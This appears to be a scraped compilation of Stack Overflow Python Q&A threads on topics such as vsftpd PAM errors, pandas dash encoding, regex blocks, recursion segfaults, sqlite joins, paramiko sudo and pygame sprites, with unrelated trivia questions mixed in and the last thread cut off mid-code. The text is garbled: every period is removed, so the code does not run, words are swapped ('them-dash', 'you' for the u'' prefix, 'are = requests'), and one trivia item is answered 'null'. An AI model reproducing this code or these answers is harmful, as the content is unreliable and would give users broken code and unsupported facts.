PAM audit_log_acct_message() failed: Operation not permitted & User auth fails I am receiving this error when authenticating users for vsftpd with pam_python on Ubuntu (13 04 development branch) in the auth log file ````vsftpd[1]: PAM audit_log_acct_message() failed: Operation not permitted ```` and then vsftpd says the password is wrong when attempting to connect Here is the full section from the auth log file: ````vsftpd[1]: pam_auth py(9): pam_sm_authenticate() vsftpd[1]: pam_auth py(9): get_user_base_dir() vsftpd[1]: pam_auth py(9): auth_user() vsftpd[1]: pam_auth py(9): get_user_base_dir() vsftpd[1]: pam_auth py(9): verify_password() vsftpd[1]: pam_auth py(5): LOGIN: dev vsftpd[1]: PAM audit_log_acct_message() failed: Operation not permitted ```` Now this is not normal at all `LOGIN: dev` is outputted when the account `dev` is properly authenticated so it should authenticate me (or the python script should give out an error) here is a healthy output from another server with the exact same configuration: ````vsftpd[11037]: pam_auth py(9): pam_sm_authenticate() vsftpd[11037]: pam_auth py(9): get_user_base_dir() vsftpd[11037]: pam_auth py(9): auth_user() vsftpd[11037]: pam_auth py(9): get_user_base_dir() vsftpd[11037]: pam_auth py(9): verify_password() vsftpd[11037]: pam_auth py(5): LOGIN: dev vsftpd[11037]: pam_auth py(9): pam_sm_acct_mgmt() vsftpd[11037]: pam_auth py(9): get_user_base_dir() vsftpd[11037]: pam_auth py(9): pam_sm_setcred() vsftpd[11037]: pam_auth py(9): get_user_base_dir() vsftpd[11037]: pam_auth py(5): /home/dev/downloads/ ```` The only thing different about this server is that it is running a different kernel (it is from a different datacenter than usual) the kernel normally is: ````Linux sb16 3 2 13-grsec-xxxx-grs-ipv6-64 #1 SMP Thu Mar 29 09:48:59 UTC 2012 x86_64 x86_64 x86_64 GNU/Linux ```` Whereas the kernel on the server where I cannot get pam to work is: ````Linux sb17 3 8 0-12-generic #21-Ubuntu SMP Thu Mar 7 19:08:49 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux ```` There is definitely something going wrong but the only error that I can see anywhere is the `audit_log_acct_message() failed` message When trying the python script directly it outputs success too: ````$ pam_auth py dev test success ```` What could be causing this? And how can I fix it/get around it?
I have the same error I compiled my kernels from kernel org I tryed a lot of kernels in the last 4hours Now i could say Kernel 3 6 11 is the last kernel that works for me Kernel 3 7 0 3 8 0 and 3 8 2 did not work With Kernel 3 6 2 and 3 6 11 everything works fine I use OpenSuSe 12 2-1 5 Up to date packages PAM is at version 3 2 2
In what year was the Bath Teacher Training College established?
null
convert them-dash to hyphen in python I am converting csv files into python Dataframe And in the original file one of the column has characters them-dash I want it replaced by hyphen "-" Partial original file from csv: ```` NoDemande NoUsager Sens IdVehicule NoConduteur HeureDebutTrajet HeureArriveeSurSite HeureEffective' 42192001801 42192002715 — 157Véh 42192000153 42192000003 42192002021 157Véh 42192000002 42192001833 42192000485 — 324My3FVéh 42192000157 ```` My code: ````#coding=latin-1 import pandas as pd import glob pd set_option('expand_frame_repr' False) path = r'D:\Python27\mypfe\data_test' allFiles = glob glob(path "/* csv") frame = pd DataFrame() list_ = [] for file_ in allFiles: df = pd read_csv(file_ index_col=None header=0 sep=';' parse_dates=['HeureDebutTrajet' 'HeureArriveeSurSite' 'HeureEffective'] dayfirst=True) df['Sens'] replace(you"\u2014" "-" inplace=True regex=True) list_ append(df) ```` And it does not work at all every time it only convert them into `?` which looks like it: ````42191001122 42191002244 ? 181Véh 42191000114 42191001293 42191001203 ? 319M9pVéh 42191000125 42191000700 42191000272 ? 183Véh 42191000072 ```` And because I have french characters in the file I am using `latin-1` instead of `utf-8` If I delete the first line and write like this: ````df = pd read_csv(file_ index_col=None header=0 sep=';' encoding='windows-1252' parse_dates=['HeureDebutTrajet' 'HeureArriveeSurSite' 'HeureEffective'] dayfirst=True) ```` The result will be: ````42191001122 42191002244 â?? 181Véh 42191000114 42191001293 42191001203 â?? 319M9pVéh 42191000125 42191000700 42191000272 â?? 183Véh 42191000072 ```` How can I make all the them-dash `—` replaced by `-`? I added the part about `repr`: ````for line in open(file_): print repr(line) ```` And the result turns out: ````'"42191002384";"42191000118";"\xe2\x80\x94";"";"42191000182"; '"42191002464";"42191001671";"+";"";"42191000182"; '"42191000045";"42191000176";"\xe2\x80\x94";"620M9pV\xc3\xa9h";"42191000003"; '"42191001305";"42191000823";"\xe2\x80\x94";"310V7pV\xc3\xa9h";"42191000126"; ````
`you'\u2014'` (THEM DASH) can not be encoded in latin1/iso-8859-1 so that value can not appear in a properly encoded latin1 file Possibly the files are encoded as windows-1252 for which `you'\u2014'` can be encoded as `'\x97'` Another problem is that the CSV file apparently uses whitespace as the column separator but your code uses semicolons You can specify whitespace as the separator using `delim_whitespace=True`: ````df = pd read_csv(file_ delim_whitespace=True) ```` You can also specify the file's encoding using the `encoding` parameter `read_csv()` will convert the incoming data to unicode: ````df = pd read_csv(file_ encoding='windows-1252' delim_whitespace=True) ```` In Python 2 (I think that you are using that) if you do not specify the encoding the data remains in the original encoding and this is probably the reason that your replacements are not working Once you have properly loaded the file you can replace characters as you have been doing: ````df = pd read_csv(file_ encoding='windows-1252' delim_whitespace=True) df['Sens'] replace(you'\u2014' '-' inplace=True) ```` <hr> <strong>EDIT</strong> Following your update where you show the `repr()` output your file would appear to be UTF8 encoded not latin1 and not Windows-1252 Since you are using Python 2 you need to specify the encoding when loading the CSV file: ````df = pd read_csv(file_ sep=';' encoding='utf8') df['Sens'] replace(you'\u2014' '-' inplace=True) ```` Because you specified an encoding `read_csv()` will convert the incoming data to unicode so `replace()` should now work as shown above It should be that easy
Mechanism for If-statements with str in python Can I be sure that `''` always will be considered `False` while anything else is not? ````&gt;&gt;&gt; if '': print('bah') &gt;&gt;&gt; if 'x': print('bah') bah ```` Why or why not? <strong>What mechanism in Python defines this behavior?</strong> If `''` is evaluated as `False` why do I get this result: ````&gt;&gt;&gt; if '' == False: print('bah') &gt;&gt;&gt; ````
From the <a href="http://docs python org/library/stdtypes html#truth-value-testing" rel="nofollow">documentation</a>: Any object can be tested for truth value for use in an `if` or `while` condition or as operand of the Boolean operations below The following values are considered false: - `None` - `False` - zero of any numeric type for example `0` `0L` `0 0` `0j` - any empty sequence for example `''` `()` `[]` - any empty mapping for example `{}` - instances of user-defined classes if the class defines a `__nonzero__()` or `__len__()` method when that method returns the integer zero or bool value `False` All other values are considered true — so objects of many types are always true
scipy optimize dll load failure on Windows 8 I am attempting to import scipy optimize using Python 3 3 1 on Windows 8 I am using scipy-0 12 0 When I attempt to import Python returns the following error: ````&gt;&gt;&gt; import scipy optimize Traceback (most recent call last): File "<stdin&gt;" line 1 in <module&gt; File "C:\Python33\lib\site-packages\scipy\optimize\__init__ py" line 146 in <module&gt; from optimize import * File "C:\Python33\lib\site-packages\scipy\optimize\optimize py" line 34 in < module&gt; from linesearch import \ File "C:\Python33\lib\site-packages\scipy\optimize\linesearch py" line 16 in <module&gt; from scipy optimize import minpack2 ImportError: DLL load failed: The specified module could not be found ```` I believe this is an operating system error because importing scipy optimize succeeds when using the same version of Python and scipy on a Windows 7 machine I would greatly appreciate any assistance Thanks
I really encourage you to Install SciPy and NumPy with one these packages: - <a href="https://code google com/p/pythonxy/" rel="nofollow">Python(x y)</a> - <a href="https://store continuum io/cshop/anaconda/" rel="nofollow">Anaconda</a> - <a href="https://www enthought com/" rel="nofollow">Enthought</a> Other wise you will end up with all the strange error because these packages mainly based on C libraries that they need to be compiled and usually standard Windows installation does not have the right compiler
Python RegEx: How to deal with lines I have a huge txt file which has the following kind of format: ````BadLine property1=a property2=b BadLine2 property1=c property2=d GOODLINE1 property1=e property2=f ```` and many more good and bad lines What I need to do is to extract the properties of the good lines (e and f in the above example) I can easily find the good lines in my file but then how do I select the properties searching other regexs only in the block associated to goodlines? Thanks guys!
The following code: ````import re test = ''' BadLine property1=a property2=b BadLine2 property1=c property2=d GOODLINE1 property1=e property2=f BadLine property1=a property2=b BadLine2 property1=c property2=d GOODLINE2 property1=e property2=f ''' pattern = r'^(GOODLINE(?:[^\n]|\n )*)' print re compile(pattern re MULTILINE) findall(test) ```` produces these results: ````['GOODLINE1\n property1=e\n property2=f' 'GOODLINE2\n property1=e\n property2=f'] ```` The pattern matches "GOODLINE" appearing at the beginning of a line as well as greedily matching characters after it that are not linefeeds as well as linefeeds that are followed by space characters If your text actually has tabs after linefeeds instead of spaces you can change the space into a tab Alternatively you could easily match either by changing the pattern like this: ````pattern = r'^(GOODLINE(?:[^\n]|\n[ \t])*)' ```` Once you have these matches it is extremely easy to use regular string `split()` in order to extract the properties Alternatively you could see if the rson package parsing satisfies your needs -- this looks like a file it could easily parse
Groupby Date reformatting my dates I have a data frame with multiple dates and counts against each date Dates can occur multiple times I grouped the data to plot a time series using: ````timeseries = df[['date' 'count']] groupby(['date']) sum() reset_index() ```` Which let us me visualize what I need but then when I try to view the exact values using: ````timeseries sort('count' ascending=False)['count'][:5] ```` The dates are printed in an indexed fashion: ````Date Count 1695 1529 1349 1013 1692 956 998 637 997 636 Name: count dtype: int64 ```` Seems I am doing something basic incorrectly which leads me to lose the date value and maintain an index instead
The solution to your problem requires you to understand the difference between a columned named "date" and an index named "Date" Then your object types of the date column need to be datetime-like Also your date column may need converting try using <a href="http://pandas pydata org/pandas-docs/stable/generated/pandas DataFrame convert_objects html" rel="nofollow">http://pandas pydata org/pandas-docs/stable/generated/pandas DataFrame convert_objects html</a> And you should not need to reset the index at the end
segmentation fault for deep recursion upon going from python 2 6 to 2 7 I have simple recursive program to find connected subgraphs The code works by traversing from each unvisited vertex in the graph all the edges (recursively) and marking those which have been visited with 'ingraph=False' in the process (the graphs are always undirected unweighted graphs) The problem I have is that for large graphs (with a subgraph of ~100 000 vertices) python(-2 7) returns a segmentation fault But this worked just fine in python-2 6 (and still does) Can someone explain to me what has changed between two (or maybe it is something else entirely)? Is there a way to fix it with python-2 7 (which preferably also does not break upon migrating to python-3 at some point)? Or should I rewrite it in a non-recursive way? Thanks! here is the source <strong>update: see update 3 below for a nonrecursive solution</strong> ````def floodfill(g): for v in g vertices: v ingraph = True sys setrecursionlimit(g size) subgraph = 1 for v in g vertices: if v ingraph: v ingraph = False v subgraph = subgraph g floodfill_search(v subgraph) subgraph = 1 def floodfill_search(g v subgraph): for n in v neighbors: if n ingraph: n ingraph = False n subgraph = subgraph g floodfill_search(n subgraph) ```` ------ UPDATE -------- I made a small recursion test which gives recursions limit of ~16 000 ~24 000 and ~28 000 for 3 different computers Moreover the result is not even constant for one pc Running the test twice gives slightly different limits For example for the second I find results between 23800 and 23819 ````#!/usr/bin/python import sys def callme(i): print(i) i+=1 callme(i) sys setrecursionlimit(int(1e6)) callme(0) ```` I do not really get which 'C stack' is referred to as far I can tell there is no default 'stack' implemented in C In C++ there are stacks but it does not have the same limitations The following C++ example runs fine (at least up to 1M pushes) ````#include <iostream&gt; #include <stack&gt; using namespace std; int main () { stack<int&gt; s; for(int i=0;i<1000000;i++) { cout << "push " << i << endl; s push(i); } } ```` The following C code also goes much deeper (about 10x ~262 000) ````#include "stdio h" void callme(i) { printf("calling %d\n" i); callme(++i); } int main() { int i=0; callme(i); } ```` ---- UPDATE 2 ----- Ok this is python's intention apparently Forcing programmers to avoid deep recursion <a href="http://neopythonic blogspot ch/2009/04/tail-recursion-elimination html" rel="nofollow">http://neopythonic blogspot ch/2009/04/tail-recursion-elimination html</a> In any case I now think it is better to rewrite it iteratively But then I will probably start over in C++ using some graph theory library like the boost graph library If I am going to have to rewrite it anyway I might as well do it properly Nevertheless I would still appreciate any comments to understand why this happens at these specific sizes ---- UPDATE 3 ----- Here is at least a quick and dirty python rewrite Dirty because it is O(N^2) because of the last line There should be a nicer O(N) solution by keeping track a list of which vertices have not been visited but did not see it so quickly and this works for my applications ````def floodfill_nonrecursive(g): for v in g vertices: v ingraph = True start = g vertices subg = 1 while start: q = [start[0]] while q: v = q pop() v ingraph = False v subgraph = subg for n in v neighbors: if n ingraph: n ingraph = False q append(n) subg = 1 start = [v for v in g vertices if v ingraph] ````
You probably overflow stack with deep recursion somewhere in Python implementation You may try changing stack dept with <a href="http://docs python org/2/library/sys html#sys setrecursionlimit" rel="nofollow">sys setrecursionlimit</a> Another possibility is that you exhaust dynamic memory Recursion is normally more taxing You had more luck with Python 2 6 Previous version required less memory for your algorithm Python is not a functional language and does not optimise tail recursion Rewriting the algorithm iteratively may be a better approach
Convert multiple columns of a pandas data frame to dummy variables - Python I have this dataframe: <img src="http://i stack imgur com/QPPgm jpg" alt="enter image description here"> As far as I know to use the scikit learn package in Python for machine leaning tasks the categorical variables should be converted to dummy variables So for example using a library of scikit learn I try to convert the values of the third column to dummy values but my code did not work: ````from sklearn preprocessing import LabelEncoder x[: 2] = LabelEncoder() fit_transform(x[: 2]) ```` So what is wrong with my code? and How Can I convert all the categorical variables to dummy variables in my data frame? Edit: The full traceback is this : ````--------------------------------------------------------------------------- TypeError Traceback (most recent call last) <ipython-input-73-c0d726db979e&gt; in <module&gt;() 1 from sklearn preprocessing import LabelEncoder 2 ---> 3 x[: 2] = LabelEncoder() fit_transform(x[: 2]) C:\Users\toshiba\Anaconda\lib\site-packages\pandas\core\frame pyc in __getitem__(self key) 2001 # get column 2002 if self columns is_unique: > 2003 return self _get_item_cache(key) 2004 2005 # duplicate columns C:\Users\toshiba\Anaconda\lib\site-packages\pandas\core\generic pyc in _get_item_cache(self item) 665 return cache[item] 666 except Exception: -> 667 values = self _data get(item) 668 res = self _box_item_values(item values) 669 cache[item] = res C:\Users\toshiba\Anaconda\lib\site-packages\pandas\core\internals pyc in get(self item) 1653 def get(self item): 1654 if self items is_unique: > 1655 _ block = self _find_block(item) 1656 return block get(item) 1657 else: C:\Users\toshiba\Anaconda\lib\site-packages\pandas\core\internals pyc in _find_block(self item) 1933 1934 def _find_block(self item): > 1935 self _check_have(item) 1936 for i block in enumerate(self blocks): 1937 if item in block: C:\Users\toshiba\Anaconda\lib\site-packages\pandas\core\internals pyc in _check_have(self item) 1939 1940 def _check_have(self item): > 1941 if item not in self items: 1942 raise KeyError('no item named %s' % com pprint_thing(item)) 1943 C:\Users\toshiba\Anaconda\lib\site-packages\pandas\core\index pyc in __contains__(self key) 317 318 def __contains__(self key): -> 319 hash(key) 320 # work around some kind of odd cython bug 321 try: TypeError: unhashable type ````
I do not think the `LabelEncoder` function transforms your data to dummy variables (see <a href="http://scikit-learn org/stable/modules/generated/sklearn preprocessing LabelEncoder html" rel="nofollow">scikit-learn org/LabelEncoder</a>) but creates new numerical labels for the variable I use the `get_dummies` function from pandas to do this (see <a href="http://pandas pydata org/pandas-docs/dev/generated/pandas get_dummies html" rel="nofollow">pandas pydata org/dummies</a>) Below a simple example Create a simple `DataFrame` with categorical and numerical data ````import pandas as pd X = pd DataFrame({"Var1": ["a" "a" "b"] "Var2": ["a" "b" "c"] "Var3": [1 2 3]} dtype = "category") X["Var3"] = X["Var3"] astype(int) ```` Transform data to dummy variables ````pd get_dummies(X) ```` Out[4]: ```` Var3 Var1_a Var1_b Var2_a Var2_b Var2_c 0 1 1 0 1 0 0 1 2 1 0 0 1 0 2 3 0 1 0 0 1 ```` Notice that `Var1` was transformed to two dummy variables but you might want to have all three categories `[a b c]` You will need to add the new category ````X["Var1"] cat add_categories("c" inplace=True) ```` And the result: ````pd get_dummies(X) ```` Out[6]: ```` Var3 Var1_a Var1_b Var1_c Var2_a Var2_b Var2_c 0 1 1 0 0 1 0 0 1 2 1 0 0 0 1 0 2 3 0 1 0 0 0 1 ```` Hope this helps
User Authentication in Pylons AuthKit I am trying to create a web application using Pylons and the resources on the web point to the <a href="http://pylonsbook com/alpha1/authentication_and_authorization">PylonsBook</a> page which is not of much help I want authentication and authorisation and is there anyway to setup Authkit to work easily with Pylons? I tried downloading the <a href="http://pypi python org/pypi/SimpleSiteTemplate/">SimpleSiteTemplate</a> from the cheeseshop but was not able to run the setup-app command It throws up an error: ```` File "/home/cnu/env/lib/python2 5/site-packages/SQLAlchemy-0 4 7-py2 5 egg/sqlalchemy/schema py" line 96 in __call__ table = metadata tables[key] AttributeError: 'module' object has no attribute 'tables' ```` I use Pylons 0 9 7rc1 SQLAlchemy 0 4 7 Authkit 0 4
I do not think AuthKit is actively maintained anymore It does use the Paste (<a href="http://pythonpaste org" rel="nofollow">http://pythonpaste org</a>) libs though for things like HTTP Basic/Digest authentication I would probably go ahead and take a look at the source for some inspiration and then use the Paste tools if you want to use HTTP authentication There is also OpenID which is very easy to setup The python-openid libs have an excellent example that is easy to translate to WSGI for wrapping a Pylons app You can look at an example: <a href="http://ionrock org/hg/brightcontent-main/file/d87b7dcc606c/brightcontent/plugins/openidauth py" rel="nofollow">http://ionrock org/hg/brightcontent-main/file/d87b7dcc606c/brightcontent/plugins/openidauth py</a>
How to use BeautifulSoup to parse a table? This is a context-specific question regarding how to use BeautifulSoup to parse an html table in python2 7 I would like to extract the html table <a href="http://sloanconsortium org/onlineprogram_listing?page=11&amp;Institution=&amp;field_op_delevery_mode_value_many_to_one%5B0%5D=100%25%20online" rel="nofollow">here</a> and place it in a tab-delim csv and have tried playing around with BeautifulSoup Code for context: ````proxies = { "http://": "198 204 231 235:3128" } site = "http://sloanconsortium org/onlineprogram_listing?page=11&amp;Institution=&amp;field_op_delevery_mode_value_many_to_one[0]=100%25%20online" are = requests get(site proxies=proxies) print 'r: ' r html_source = r text print 'src: ' html_source soup = BeautifulSoup(html_source) ```` Why does not this code get the 4th row? ````soup find('table' 'views-table cols-6') tr[4] ```` How would I print out all of the elements in the first row (not the header row)?
Okey someone might be able to give you a one liner but the following should get you started ````table = soup find('table' class_='views-table cols-6') for row in table find_all('tr'): row_text = list() for item in row find_all('td'): text = item text strip() row_text append(text encode('utf8')) print row_text ```` I believe your tr[4] is believed to be an attribute and not an index as you suppose
Counting by Pulling Data From Multiple Tables Using Multiple Keys with sqlite3 <h2>The Answer</h2> CL 's answer does the trick! I ended up using a Python script (which can be viewed in the next section down called "Updates: Working Towards an Answer") and once I set up my database properly so that the ID columns were set as integer keys (or if that was not possible numeric) and the Name columns were set as text then it worked! <h2>Updates: Working Towards an Answer</h2> I tried running a py file that looks like this: ````import sqlite3 conn = sqlite3 connect('data db') c = conn cursor() c executescript(""" UPDATE CorpData SET OperationID4Counter = (SELECT COUNT(*) FROM PlantData JOIN OperationData ON PlantName LIKE '%' || OperationName WHERE OperationID IN (SELECT OperationID FROM ServiceData WHERE ServiceID = 512) AND CorpID = CorpData CorpID) """) ```` and get this error: `sqlite3 OperationalError: ambiguous column name: OperationID` I am guessing this is because we have joined PlantData and OperationData both of which have a column named `OperationID` When I change that line of code to read `WHERE OperationData OperationID IN (SELECT OperationID` or `WHERE PlantData OperationID IN (SELECT OperationID` it runs but I end up with a zero in all rows of my `CorpData` table under the `OperationID4Counter` column I think we are close but no cigar I think something is not right with the `ON StationName LIKE '%' || OperationName` line because when I change it to `ON StationName LIKE '%house'` (which should if I understand this properly get all that end in 'house' which would include Warehouse) I still end up with all zeroes for the OperationID4Counter (even though it should at least be counting Warehouses which do have an OperationID4 ) CL asked for some dump information to see what types are being used in this database I have not specified anything so it has just been using defaults Also note that the various tables have more columns than the ones I showed in my examples (but also note that these columns are not relevant for this question as they deal with data not related to the question at hand ) For example one piece of the dump for the PlantData table looks like this: ````INSERT INTO "PlantData" VALUES('60015145' '0' '0' '50000000' '10000' '15' '386 8' '1000181' '30003830' '20000560' '10000048' 'Anytown 334 - Unit 3 - Widgit Corp Logistics Center' '-1 444E+12' '-71312793600' '-9 25528E+11' '0 5' '0 025' '4 '); ```` A dump piece from OperationData looks like this: ````INSERT INTO "OperationData" VALUES('20' '45' 'Manufacturing' '' '0' '0' '0' '0' '0' '' '' '' '' ''); ```` And a dump piece from CorpData looks like this: ````INSERT INTO "CorpData" VALUES(NULL 0 '1000158' 'Shapeset' ' S' ' N' ' 500005' ' XYZ Consortium' ' 20' '6' '7' '1' '5' '0'); ```` <h2>The Background &amp; Data Samples</h2> I have 4 tables - 3 of which I want to draw data from to increase a counter under certain conditions and then add this counter as a new column to the 4th This 4th table let us call it `CorpData` (which I want to add more data to) currently looks like this and generally has between 10-50 rows (note that I am using commas to show column separators): ````CorpID CorpName Size Type PlantCount OtherCounter1 OtherCounter2 OtherCounter3 OtherCounter4 OtherCounter5 100002 Widgit Corp G ARE 25 1 5 4 3 0 100004 ACME Corp G S 15 15 4 25 28 1 ```` The notable pieces are CorpID (a unique key) and PlantCount which is a counter for how many plants (i e facilities) this corporation has The 1st of these additional data source tables let us call it `OperationData` has data like this and has about 50 rows: ````OperationID OperationName Description 1 Warehouse This facility stores items 2 Distribution Center Items are brought her from Warehouses to be distributed 3 Factory Goods are manufactured here ```` The 2nd `ServiceData` has around 700 rows and looks something like this: ````OperationID ServiceID 1 4 1 25 1 33 1 105 1 19505 1 32590 2 4 2 25 2 55 2 199 2 19505 2 335679 2 529934 3 2 3 105 3 55 3 170 3 48907 ```` Each ServiceID is explained in yet another table but I want to search for one or two ServiceIDs that I will specify like 4 and 55 The last of the data tables of note let us call it `PlantData` has details for all the plants for all the corporations so it has around 5200 rows and looks like this: ````PlantID CorpID CityID CountryID PlantName 60000004 100002 74900 34590 Somewhereville 123 - Widgit Corp Warehouse 60000007 100002 74878 34590 Anytown 334 - Unit 3 - Widgit Corp Distribution Center 60000023 100002 56799 23487 Quietville 532 - Unit 4 - Widgit Corp Warehouse 60000027 100004 74900 34590 Somewhereville 544 - Unit 3 - ACME Corp Distribution Center 60000150 100004 56799 23487 Quietville 312 - Unit 2 - ACME Corp Factory 60000155 100004 56799 23487 Quietville 312 - Unit 4 - ACME Corp Warehouse ```` Note the following: 1) CorpID in this table matches CorpID in my starting table 2) The CorpName for a given CorpID will always appear in the PlantName 3) The PlantName also contains one OperationName 4) One CityID can have multiple corporation's plants as well as multiple of the same corporation's plants 4) As a sidenote this is just a small piece of this table and if you counted all the times that a given CorpID shows up in this table it would be the same as the PlantCount for that CorpID (so this can be used as a check of some sort to make sure no plants were missed ) <h2>The Question</h2> I want to add two new columns to `CorpData` table both of them will be counts - the first will be a count of how many plants that corp has with the ServiceID 4 and the second a count of how many plants that corp has with ServiceID 55 To do this I need to look over the long `PlantData` table parse out the OperationName (from the `OperationData` table) from each PlantName check to find that OperationName's corresponding OperationID (in the `OperationData` table) and see if that OperationID is listed with the ServiceID (from the `ServiceData` table) in question (4 in the first case and 55 in the 2nd ) I intend to do this using sqlite3 with my 4 tables stored in a db file but I might be open to other options if you can make a solid case why I should use that option over sqlite3 <h2>The Goal</h2> My end goal given the examples here would have the `CorpData` table looking like this: ````CorpID CorpName Size Type PlantCount OtherCounter1 OtherCounter2 OtherCounter3 OtherCounter4 OtherCounter5 OperationID4Counter OperationID55Counter 100002 Widgit Corp G ARE 25 1 5 4 3 0 3 1 100004 ACME Corp G S 15 15 4 25 28 1 2 2 ```` This is because Widgit Corp has two Warehouses and a Distribution Center Warehouses and Distribution Centers both have OperationID 4 but only a Distribution Center and a Factory have OperationID 55 and ACME Corp has 1 each of Factory Warehouse and Distribution Center and Factories do not have OperationID 4 but they do have OperationID 55 <h2>Other Notes</h2> Here is some things that I think might make this trickier: - PlantName contains several words and it may or may not have the `Unit X -` part OperationName is not always just one word long and CorpName can also be more (or less) than two words Thus finding OperationName within PlantName will probably have to look over the whole thing rather than trying to split it into pieces somehow to search over just the piece that likely contains the OperationName - As we work our way down the `PlantData` table and count matches we have to keep checking two other tables to see if a row in `PlantData` should be counted or not I am concerned that if this code is not built properly that it might end up being very slow - It is tricky for me at least to wrap my mind around all this so it might be easy to refer to the wrong table or miss a step in the search from things like OperationName to corresponding OperationID
<pre class="lang-sql prettyprint-override">`UPDATE CorpData SET OperationID4Counter = (SELECT COUNT(*) FROM PlantData JOIN OperationData ON PlantName LIKE '%' || OperationName WHERE OperationData OperationID IN (SELECT OperationID FROM ServiceData WHERE ServiceID = 4) AND CorpID = CorpData CorpID) ````
Python: itertools for generating this combination? Is there an itertools function that will generate `x` as in this combination? ````for op1 in ['+' '-' '*']: for op2 in ['+' '-' '*']: for op3 in ['+' '-' '*']: for op4 in ['+' '-' '*']: x = [op1 op2 op3 op4] ````
You can use `itertools product`: ````&gt;&gt;&gt; from itertools import product &gt;&gt;&gt; list(product(['+' '-' '*'] repeat=4)) [('+' '+' '+' '+') ('+' '+' '+' '-') ('+' '+' '+' '*') ('+' '+' '-' '+') ('+' '+' '-' '-') ('+' '+' '-' '*') ('+' '+' '*' '+') ('+' '+' '*' '-') ('+' '+' '*' '*') ('+' '-' '+' '+') ('+' '-' '+' '-') ('+' '-' '+' '*') ('+' '-' '-' '+') ('+' '-' '-' '-') ('+' '-' '-' '*') ('+' '-' '*' '+') ('+' '-' '*' '-') ('+' '-' '*' '*') ('+' '*' '+' '+') ('+' '*' '+' '-') ('+' '*' '+' '*') ('+' '*' '-' '+') ('+' '*' '-' '-') ('+' '*' '-' '*') ('+' '*' '*' '+') ('+' '*' '*' '-') ('+' '*' '*' '*') ('-' '+' '+' '+') ('-' '+' '+' '-') ('-' '+' '+' '*') ('-' '+' '-' '+') ('-' '+' '-' '-') ('-' '+' '-' '*') ('-' '+' '*' '+') ('-' '+' '*' '-') ('-' '+' '*' '*') ('-' '-' '+' '+') ('-' '-' '+' '-') ('-' '-' '+' '*') ('-' '-' '-' '+') ('-' '-' '-' '-') ('-' '-' '-' '*') ('-' '-' '*' '+') ('-' '-' '*' '-') ('-' '-' '*' '*') ('-' '*' '+' '+') ('-' '*' '+' '-') ('-' '*' '+' '*') ('-' '*' '-' '+') ('-' '*' '-' '-') ('-' '*' '-' '*') ('-' '*' '*' '+') ('-' '*' '*' '-') ('-' '*' '*' '*') ('*' '+' '+' '+') ('*' '+' '+' '-') ('*' '+' '+' '*') ('*' '+' '-' '+') ('*' '+' '-' '-') ('*' '+' '-' '*') ('*' '+' '*' '+') ('*' '+' '*' '-') ('*' '+' '*' '*') ('*' '-' '+' '+') ('*' '-' '+' '-') ('*' '-' '+' '*') ('*' '-' '-' '+') ('*' '-' '-' '-') ('*' '-' '-' '*') ('*' '-' '*' '+') ('*' '-' '*' '-') ('*' '-' '*' '*') ('*' '*' '+' '+') ('*' '*' '+' '-') ('*' '*' '+' '*') ('*' '*' '-' '+') ('*' '*' '-' '-') ('*' '*' '-' '*') ('*' '*' '*' '+') ('*' '*' '*' '-') ('*' '*' '*' '*')] ````
How to run sudo with paramiko? (Python) What I have tried: - invoke_shell() then channel send su then send the password resulted in not being root - invoke_shell() then channel exec_command resulted in Channel Closed error - _transport open_session() then channel exec_command resulted in not being in root - invoke_shell() then write to the stdin and flush it resulted in not being in root
check this example out: ````ssh connect('127 0 0 1' username='jesse' password='lol') stdin stdout stderr = ssh exec_command( "sudo dmesg") stdin write('lol\n') stdin flush() data = stdout read splitlines() for line in data: if line split(':')[0] == 'AirPort': print line ```` Example found here with more explanations: <a href="http://jessenoller com/2009/02/05/ssh-programming-with-paramiko-completely-different/">http://jessenoller com/2009/02/05/ssh-programming-with-paramiko-completely-different/</a> Hope it helps!
What US president was critical of Egypt's repression of Muslim Brotherhood?
US president Barack Obama
How do I capture the output from a MoinMoin parser? Say I am writing a parser and want to include the output of another parser in the results I am returning If I do something like this: ````WikiParser = wikiutil importPlugin(self request cfg 'parser' 'text_moin_wiki' 'Parser') wp = WikiParser("some text" self request) wp format(self formatter) ```` then WikiParser will throw the results of its work straight into my self request object I would like to intercept that though - I would rather grab the results of the WikiParser work and manipulate them a bit more Is there a way for me to do this? How do I do it?
The Request object has a redirectedOutput function just for this purpose: ````parsed_formatted_string = self request redirectedOutput(wp format self formatter) ````
List comprehension for series of deltas How would you write a list comprehension in python to generate a series of `n-1` deltas between `n` items in an ordered list? Example: ````L = [5 9 2 1 7] RES = [5-9 9-2 2-1 1-7] = [4 7 1 6] # absolute values ````
The <a href="http://docs python org/library/itertools html#recipes" rel="nofollow">recipes</a> section of the <a href="http://docs python org/library/itertools html" rel="nofollow">itertools documentation</a> includes source code for a function called pairwise that you can use for this purpose: ````from itertools import * def pairwise(iterable): "s > (s0 s1) (s1 s2) (s2 s3) " a b = tee(iterable) b next() return izip(a b) ```` You can copy and paste this into your file With this function defined it is quite simple to do what you want: ````l = [5 9 2 1 7] print [abs(a-b) for a b in pairwise(l)] ```` Result ````[4 7 1 6] ````
Cannot make sprite invisible in pygame So I am making a basic pygame and I have several "barriers" and "portals" on the game map The former are spots that the player cannot touch and the latter are spots that change the level I am trying to make them invisible so just have an invisible rectangle on the map that the collision detection would notice but right now when I blit it to the map I have ugly black blobs I tried using dirty rectangles but that did not seem to work out so well My code (or at least the spots that handle the barriers and portals): ````class Barrier(pygame sprite DirtySprite): '''class that builds up the invisible barriers in the game''' #constructor function def __init__(self posX posY width height): #create a self variable to refer to the object #call up the parent's constructor pygame sprite DirtySprite __init__(self) self dirty = 1 self visible = 0 #Make the barrier self image = pygame Surface([width height]) #debug code that makes sure that the barrier is in the right place #self image fill(white) # place the top left corner of the barrier at the given location self rect = self image get_rect() self rect y = posY self rect x = posX barriers = pygame sprite Group() #global barrier list used in all maps portals = pygame sprite Group() #global portal list used in all maps class Portal(pygame sprite DirtySprite): '''class that builds up the portals in the game''' #constructor function def __init__(self posX posY width height): #create a self variable to refer to the object #call up the parent's constructor pygame sprite DirtySprite __init__(self) self dirty = 1 self visible = 0 #Make the barrier self image = pygame Surface([width height]) #debug code that makes sure that the barrier is in the right place self image fill(black) # place the top left corner of the barrier at the given location self rect = self image get_rect() self rect y = posY self rect x = posX def LoadInside(): barriers empty() portals empty() #Load up the level image whichLevel = 1 background_image = pygame image load("House png") convert() #a list of all the barriers in the room room_barrier_list = pygame sprite Group() #make a barrier out of all of the objects in the room barrierTopWall = Barrier(0 125 661 7) barrierLeftWall= Barrier(5 130 5 300) barrierBottomWallLeft= Barrier(10 414 292 7) barrierBottomWallRight= Barrier(364 412 298 